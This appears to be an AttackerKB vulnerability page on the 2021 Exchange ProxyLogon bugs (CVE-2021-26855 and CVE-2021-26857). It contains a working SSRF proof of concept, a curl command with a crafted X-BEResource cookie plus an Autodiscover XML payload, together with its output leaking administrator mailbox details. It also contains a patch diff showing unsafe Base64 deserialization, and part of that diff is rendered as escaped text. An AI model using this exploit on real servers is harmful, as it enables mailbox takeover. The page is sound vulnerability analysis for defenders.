<font color="darkgreen"> // Use the 'client' variable to call operations on the service.

</font><font color="darkgreen"> // Always close the client.
</font> client.Close();
}
}
</PRE><BR/><h2 class='intro'>Visual Basic</h2><br /><PRE><font color="blue">Class </font><font color="black">Test
</font><font color="blue"> Shared Sub </font>Main()
<font color="blue"> Dim </font>client As <font color="black">HelloClient</font> = <font color="blue">New </font><font color="black">HelloClient</font>()
<font color="darkgreen"> ' Use the 'client' variable to call operations on the service.

</font><font color="darkgreen"> ' Always close the client.
</font> client.Close()
<font color="blue"> End Sub
* Connection #0 to host 192.168.123.183 left intact
</font><font color="blue">End Class</font></PRE></DIV></BODY></HTML>* Closing connection 0
wvu@kharak:~$

`POST`ing to the [EWS](<https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/ews-reference-for-exchange>) endpoint (not shown) allows an attacker access to a target’s mailbox. A sample [Autodiscover request](<https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/pox-autodiscover-request-for-exchange>) is shown below.

```
wvu@kharak:~/Downloads$ cat poc.xml
<?xml version="1.0"?>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
  <Request>
    <EMailAddress>Administrator@gibson.local</EMailAddress>
    <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
  </Request>
</Autodiscover>
wvu@kharak:~/Downloads$ curl -kvb "X-BEResource=WIN-T4RO9496TA7/autodiscover/autodiscover.xml?~$RANDOM" -H "Content-Type: text/xml" "https://192.168.123.207/ecp/$RANDOM.js" -d @poc.xml
* Trying 192.168.123.207...
* TCP_NODELAY set
* Connected to 192.168.123.207 (192.168.123.207) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
* CAfile: /etc/ssl/cert.pem
  CApath: none
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256
* ALPN, server accepted to use h2
* Server certificate:
* subject: CN=WIN-T4RO9496TA7
* start date: Mar 8 22:45:17 2021 GMT
* expire date: Mar 8 22:45:17 2026 GMT
* issuer: CN=WIN-T4RO9496TA7
* SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x7fa592808200)
> POST /ecp/3425.js HTTP/2
> Host: 192.168.123.207
> User-Agent: curl/7.64.1
> Accept: */*
> Cookie: X-BEResource=WIN-T4RO9496TA7/autodiscover/autodiscover.xml?~24753
> Content-Type: text/xml
> Content-Length: 354
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 100)!
* We are completely uploaded and fine
< HTTP/2 200
< cache-control: private
< content-type: text/xml; charset=utf-8
< server: Microsoft-IIS/10.0
< request-id: bde5e90a-fe14-4b47-aaca-1a713d9832b1
< x-calculatedbetarget: win-t4ro9496ta7
< x-calculatedbetarget: win-t4ro9496ta7.gibson.local
< x-diaginfo: WIN-T4RO9496TA7
< x-beserver: WIN-T4RO9496TA7
< x-feserver: WIN-T4RO9496TA7
< x-aspnet-version: 4.0.30319
< set-cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgai2sdKry62wxsvGyau+yNGYlp2MkJHRk5CcnpOBzsbLzc/JzM3MzYHNz83O0s/M0s7Pq8/OxczJxc7G; expires=Wed, 10-Mar-2021 01:36:19 GMT; path=/autodiscover; secure; HttpOnly
< x-powered-by: ASP.NET
< x-feserver: WIN-T4RO9496TA7
< date: Wed, 10 Mar 2021 01:26:19 GMT
< content-length: 3866
<
<?xml version="1.0" encoding="utf-8"?>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006">
  <Response xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <User>
      <DisplayName>Administrator</DisplayName>
      <LegacyDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=94812d66d68146e8b6ac7b3312a93d7b-Admin</LegacyDN>
      <AutoDiscoverSMTPAddress>Administrator@gibson.local</AutoDiscoverSMTPAddress>
      <DeploymentId>eb64d327-1a67-4c9c-b64d-38d567e95480</DeploymentId>
    </User>
    <Account>
      <AccountType>email</AccountType>
      <Action>settings</Action>
      <MicrosoftOnline>False</MicrosoftOnline>
      <Protocol>
        <Type>EXCH</Type>
        <Server>47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local</Server>
        <ServerDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local</ServerDN>
        <ServerVersion>73C18880</ServerVersion>
        <MdbDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local/cn=Microsoft Private MDB</MdbDN>
        <PublicFolderServer>win-t4ro9496ta7.gibson.local</PublicFolderServer>
        <AD>WIN-T4RO9496TA7.gibson.local</AD>
        <ASUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</ASUrl>
        <EwsUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</EwsUrl>
        <EmwsUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</EmwsUrl>
        <EcpUrl>https://win-t4ro9496ta7.gibson.local/owa/</EcpUrl>
        <EcpUrl-um>?path=/options/callanswering</EcpUrl-um>
        <EcpUrl-aggr>?path=/options/connectedaccounts</EcpUrl-aggr>
        <EcpUrl-mt>options/ecp/PersonalSettings/DeliveryReport.aspx?rfr=olk&exsvurl=1&IsOWA=<IsOWA>&MsgID=<MsgID>&Mbx=<Mbx>&realm=gibson.local</EcpUrl-mt>
        <EcpUrl-ret>?path=/options/retentionpolicies</EcpUrl-ret>
        <EcpUrl-sms>?path=/options/textmessaging</EcpUrl-sms>
        <EcpUrl-photo>?path=/options/myaccount/action/photo</EcpUrl-photo>
        <EcpUrl-tm>options/ecp/?rfr=olk&ftr=TeamMailbox&exsvurl=1&realm=gibson.local</EcpUrl-tm>
        <EcpUrl-tmCreating>options/ecp/?rfr=olk&ftr=TeamMailboxCreating&SPUrl=<SPUrl>&Title=<Title>&SPTMAppUrl=<SPTMAppUrl>&exsvurl=1&realm=gibson.local</EcpUrl-tmCreating>
        <EcpUrl-tmEditing>options/ecp/?rfr=olk&ftr=TeamMailboxEditing&Id=<Id>&exsvurl=1&realm=gibson.local</EcpUrl-tmEditing>
        <EcpUrl-extinstall>?path=/options/manageapps</EcpUrl-extinstall>
        <OOFUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</OOFUrl>
        <UMUrl>https://win-t4ro9496ta7.gibson.local/EWS/UM2007Legacy.asmx</UMUrl>
        <ServerExclusiveConnect>off</ServerExclusiveConnect>
      </Protocol>
      <Protocol>
        <Type>EXPR</Type>
        <Server>win-t4ro9496ta7.gibson.local</Server>
        <SSL>Off</SSL>
        <AuthPackage>Ntlm</AuthPackage>
        <ServerExclusiveConnect>on</ServerExclusiveConnect>
        <CertPrincipalName>None</CertPrincipalName>
        <GroupingInformation>Default-First-Site-Name</GroupingInformation>
      </Protocol>
      <Protocol>
        <Type>WEB</Type>
        <Internal>
          <OWAUrl AuthenticationMethod="Basic, Fba">https://win-t4ro9496ta7.gibson.local/owa/</OWAUrl>
          <Protocol>
            <Type>EXCH</Type>
            <ASUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</ASUrl>
          </Protocol>
        </Internal>
      </Protocol>
    </Account>
  </Response>
* Connection #0 to host 192.168.123.207 left intact
</Autodiscover>* Closing connection 0
wvu@kharak:~/Downloads$
```

**cdelafuente-r7** at March 24, 2021 2:49pm UTC reported:

Assessed Attacker Value: 5
Assessed Attacker Value: 5
Assessed Attacker Value: 4

CVSS v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (exploitability 3.9, impact 5.9)
CVSS v2: 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P (exploitability 10.0, impact 6.4)
Published: 2021-03-03; modified: 2021-03-03
Related CVEs: CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078
Source: AttackerKB topic AKB:5D17BB38-86BB-4514-BF1D-39EB48FBE4F1, https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855

# CVE-2021-26857

Last seen: 2023-10-18.

Microsoft Exchange Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.

**Recent assessments:**

**wvu-r7** at March 03, 2021 6:59pm UTC reported:

As per [Microsoft’s blog post](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) on Exchange Server 0day use by the HAFNIUM actors, [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) is a deserialization vulnerability in Exchange Server’s Unified Messaging (voicemail) service. Exploiting the vulnerability reportedly requires admin access or chaining with another vuln (likely [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>)), but successful exploitation results in RCE as the `SYSTEM` account. This vulnerability would ideally be combined with an [auth bypass](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>), which CVE-2021-26855 may very well provide.

I took a look at CVE-2021-26857 last night and came up with the following patch diff:

```diff
--- exchange.unpatched/Microsoft.Exchange.UM.UMCore/UMCore/PipelineContext.cs	2021-03-02 19:54:18.000000000 -0600
+++ exchange.patched/Microsoft.Exchange.UM.UMCore/UMCore/PipelineContext.cs	2021-03-02 19:55:19.000000000 -0600
@@ -1,742 +1,886 @@
 ﻿using System;
+using System.Collections.Generic;
 using System.Globalization;
 using System.IO;
+using System.Runtime.Serialization;
+using Microsoft.Exchange.Compliance.Serialization.Formatters;
+using Microsoft.Exchange.Data;
+using Microsoft.Exchange.Data.Common;
 using Microsoft.Exchange.Data.Directory;
 using Microsoft.Exchange.Data.Directory.Recipient;
 using Microsoft.Exchange.Data.Directory.SystemConfiguration;
 using Microsoft.Exchange.Data.Storage;
 using Microsoft.Exchange.Diagnostics;
 using Microsoft.Exchange.Diagnostics.Components.UnifiedMessaging;
 using Microsoft.Exchange.ExchangeSystem;
 using Microsoft.Exchange.TextProcessing.Boomerang;
 using Microsoft.Exchange.UM.UMCommon;
+using Microsoft.Mapi;
 
 namespace Microsoft.Exchange.UM.UMCore
 {
 	internal abstract class PipelineContext : DisposableBase, IUMCreateMessage
 	{
 		internal PipelineContext()
 		{
 		}
 
 		internal PipelineContext(SubmissionHelper helper)
 		{
 			bool flag = false;
 			try
 			{
 				this.helper = helper;
 				this.cultureInfo = new CultureInfo(helper.CultureInfo);
 				flag = true;
 			}
 			finally
 			{
 				if (!flag)
 				{
 					this.Dispose();
 				}
 			}
 		}
 
 		public MessageItem MessageToSubmit
 		{
 			get
 			{
 				return this.messageToSubmit;
 			}
 			protected set
 			{
 				this.messageToSubmit = value;
 			}
 		}
 
 		public string MessageID
 		{
 			get
 			{
 				return this.messageID;
 			}
 			protected set
 			{
 				this.messageID = value;
 			}
 		}
 
 		internal abstract Pipeline Pipeline { get; }
 
 		internal Microsoft.Exchange.UM.UMCommon.PhoneNumber CallerId
 		{
 			get
 			{
 				return this.helper.CallerId;
 			}
 		}
 
 		internal Guid TenantGuid
 		{
 			get
```
\t\t\t{\n \t\t\t\treturn this.helper.TenantGuid;\n \t\t\t}\n \t\t}\n \n \t\tinternal int ProcessedCount\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.processedCount;\n \t\t\t}\n \t\t}\n \n \t\tinternal ExDateTime SentTime\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.sentTime;\n \t\t\t}\n \t\t\tset\n \t\t\t{\n \t\t\t\tthis.sentTime = value;\n \t\t\t}\n \t\t}\n \n \t\tinternal CultureInfo CultureInfo\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.cultureInfo;\n \t\t\t}\n \t\t}\n \n \t\tprotected internal string HeaderFileName\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\tif (string.IsNullOrEmpty(this.headerFileName))\n \t\t\t\t{\n \t\t\t\t\tGuid guid = Guid.NewGuid();\n \t\t\t\t\tthis.headerFileName = Path.Combine(Utils.VoiceMailFilePath, guid.ToString() + \".txt\");\n \t\t\t\t}\n \t\t\t\treturn this.headerFileName;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.headerFileName = value;\n \t\t\t}\n \t\t}\n \n \t\tprotected internal string CallerAddress\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.helper.CallerAddress;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.helper.CallerAddress = value;\n \t\t\t}\n \t\t}\n \n \t\tprotected internal string CallerIdDisplayName\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.helper.CallerIdDisplayName;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.helper.CallerIdDisplayName = value;\n \t\t\t}\n \t\t}\n \n \t\tprotected internal string MessageType\n \t\t{\n \t\t\tinternal get\n \t\t\t{\n \t\t\t\treturn this.messageType;\n \t\t\t}\n \t\t\tset\n \t\t\t{\n \t\t\t\tthis.messageType = value;\n \t\t\t}\n \t\t}\n \n \t\tpublic virtual void PrepareUnProtectedMessage()\n \t\t{\n \t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, this.GetHashCode(), \"PipelineContext:PrepareUnProtectedMessage.\", Array.Empty<object>());\n \t\t\tusing (DisposeGuard disposeGuard = default(DisposeGuard))\n \t\t\t{\n \t\t\t\tthis.messageToSubmit = 
MessageItem.CreateInMemory(StoreObjectSchema.ContentConversionProperties);\n \t\t\t\tdisposeGuard.Add<MessageItem>(this.messageToSubmit);\n \t\t\t\tthis.SetMessageProperties();\n \t\t\t\tdisposeGuard.Success();\n \t\t\t}\n \t\t}\n \n \t\tpublic virtual void PrepareProtectedMessage()\n \t\t{\n \t\t\tthrow new InvalidOperationException();\n \t\t}\n \n \t\tpublic virtual void PrepareNDRForFailureToGenerateProtectedMessage()\n \t\t{\n \t\t\tthrow new InvalidOperationException();\n \t\t}\n \n \t\tpublic virtual PipelineDispatcher.WIThrottleData GetThrottlingData()\n \t\t{\n \t\t\treturn new PipelineDispatcher.WIThrottleData\n \t\t\t{\n \t\t\t\tKey = this.GetMailboxServerId(),\n \t\t\t\tRecipientId = this.GetRecipientIdForThrottling(),\n \t\t\t\tWorkItemType = PipelineDispatcher.ThrottledWorkItemType.NonCDRWorkItem\n \t\t\t};\n \t\t}\n \n \t\tpublic virtual void PostCompletion()\n \t\t{\n \t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, 0, \"PipelineContext - Deleting header file '{0}'\", new object[]\n \t\t\t{\n \t\t\t\tthis.headerFileName\n \t\t\t});\n \t\t\tUtil.TryDeleteFile(this.headerFileName);\n \t\t}\n \n \t\tinternal static PipelineContext FromHeaderFile(string headerFile)\n \t\t{\n \t\t\tPipelineContext pipelineContext = null;\n \t\t\tPipelineContext result;\n \t\t\ttry\n \t\t\t{\n \t\t\t\tContactInfo contactInfo = null;\n \t\t\t\tstring text = null;\n \t\t\t\tint num = 0;\n \t\t\t\tExDateTime exDateTime = default(ExDateTime);\n \t\t\t\tstring text2 = null;\n \t\t\t\tSubmissionHelper submissionHelper = new SubmissionHelper();\n \t\t\t\tuint num2;\n \t\t\t\tusing (StreamReader streamReader = File.OpenText(headerFile))\n \t\t\t\t{\n \t\t\t\t\tstring text3;\n \t\t\t\t\twhile ((text3 = streamReader.ReadLine()) != null)\n \t\t\t\t\t{\n \t\t\t\t\t\tstring[] array = text3.Split(\" : \".ToCharArray(), 2, StringSplitOptions.RemoveEmptyEntries);\n \t\t\t\t\t\tif (array != null && array.Length == 2)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tstring text4 = array[0];\n 
\t\t\t\t\t\t\tnum2 = <PrivateImplementationDetails>.ComputeStringHash(text4);\n \t\t\t\t\t\t\tif (num2 <= 872212143U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (num2 <= 134404218U)\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tif (num2 != 77294025U)\n \t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\tif (num2 != 111122938U)\n \t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tif (num2 == 134404218U)\n +\t\t\t\t\t\t\t\t\t\t\tif (num2 != 134404218U)\n \t\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\t\tif (text4 == \"ProcessedCount\")\n -\t\t\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\t\t\tnum = Convert.ToInt32(array[1], CultureInfo.InvariantCulture) + 1;\n -\t\t\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"ProcessedCount\"))\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tnum = Convert.ToInt32(array[1], CultureInfo.InvariantCulture) + 1;\n +\t\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\t\t\telse if (text4 == \"RecipientObjectGuid\")\n +\t\t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"RecipientObjectGuid\"))\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.RecipientObjectGuid = new Guid(array[1]);\n \t\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\t\telse if (text4 == \"CallerNAme\")\n +\t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallerNAme\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\tsubmissionHelper.CallerName = array[1];\n \t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\telse if (num2 <= 507978139U)\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tif 
(num2 != 152414519U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (num2 == 507978139U)\n +\t\t\t\t\t\t\t\t\t\tif (num2 != 507978139U)\n \t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tif (text4 == \"RecipientName\")\n -\t\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.RecipientName = array[1];\n -\t\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"RecipientName\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tsubmissionHelper.RecipientName = array[1];\n +\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\t\telse if (text4 == \"ContactInfo\")\n +\t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tcontactInfo = (CommonUtil.Base64Deserialize(array[1]) as ContactInfo);\n -\t\t\t\t\t\t\t\t\t\tcontinue;\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"ContactInfo\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tException ex = null;\n +\t\t\t\t\t\t\t\t\t\ttry\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\ttry\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\tusing (MemoryStream memoryStream = new MemoryStream(Convert.FromBase64String(array[1])))\n +\t\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\t\tcontactInfo = (ContactInfo)TypedBinaryFormatter.DeserializeObject(memoryStream, PipelineContext.contactInfoDeserializationAllowList, null, true);\n +\t\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tcatch (ArgumentNullException ex)\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tcatch (SerializationException ex)\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tcatch (Exception ex)\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tcontinue;\n +\t\t\t\t\t\t\t\t\t\t}\n 
+\t\t\t\t\t\t\t\t\t\tfinally\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tif (ex != null)\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, 0, \"Failed to get contactInfo from header file {0} with Error={1}\", new object[]\n +\t\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\t\theaderFile,\n +\t\t\t\t\t\t\t\t\t\t\t\t\tex\n +\t\t\t\t\t\t\t\t\t\t\t\t});\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\telse if (num2 != 707084238U)\n \t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\tif (num2 == 872212143U)\n +\t\t\t\t\t\t\t\t\tif (num2 != 872212143U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (text4 == \"CallerId\")\n -\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.CallerId = Microsoft.Exchange.UM.UMCommon.PhoneNumber.Parse(array[1]);\n -\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallerId\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tsubmissionHelper.CallerId = Microsoft.Exchange.UM.UMCommon.PhoneNumber.Parse(array[1]);\n +\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\telse if (text4 == \"SentTime\")\n +\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"SentTime\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\tDateTime dateTime = Convert.ToDateTime(array[1], CultureInfo.InvariantCulture);\n \t\t\t\t\t\t\t\t\texDateTime = new ExDateTime(ExTimeZone.CurrentTimeZone, dateTime);\n \t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t\telse if (num2 <= 2593661420U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (num2 <= 1526417836U)\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tif (num2 != 978885386U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif 
(num2 == 1526417836U)\n +\t\t\t\t\t\t\t\t\t\tif (num2 != 1526417836U)\n \t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tif (text4 == \"MessageType\")\n -\t\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\t\ttext = array[1];\n -\t\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"MessageType\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\ttext = array[1];\n +\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\t\telse if (text4 == \"CallerAddress\")\n +\t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallerAddress\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\tsubmissionHelper.CallerAddress = array[1];\n \t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\telse if (num2 != 1850847732U)\n \t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\tif (num2 == 2593661420U)\n +\t\t\t\t\t\t\t\t\tif (num2 != 2593661420U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (text4 == \"CallId\")\n -\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.CallId = array[1];\n -\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallId\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tsubmissionHelper.CallId = array[1];\n +\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\telse if (text4 == \"CallerIdDisplayName\")\n +\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallerIdDisplayName\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\tsubmissionHelper.CallerIdDisplayName = array[1];\n \t\t\t\t\t\t\t\t\tcontinue;\n 
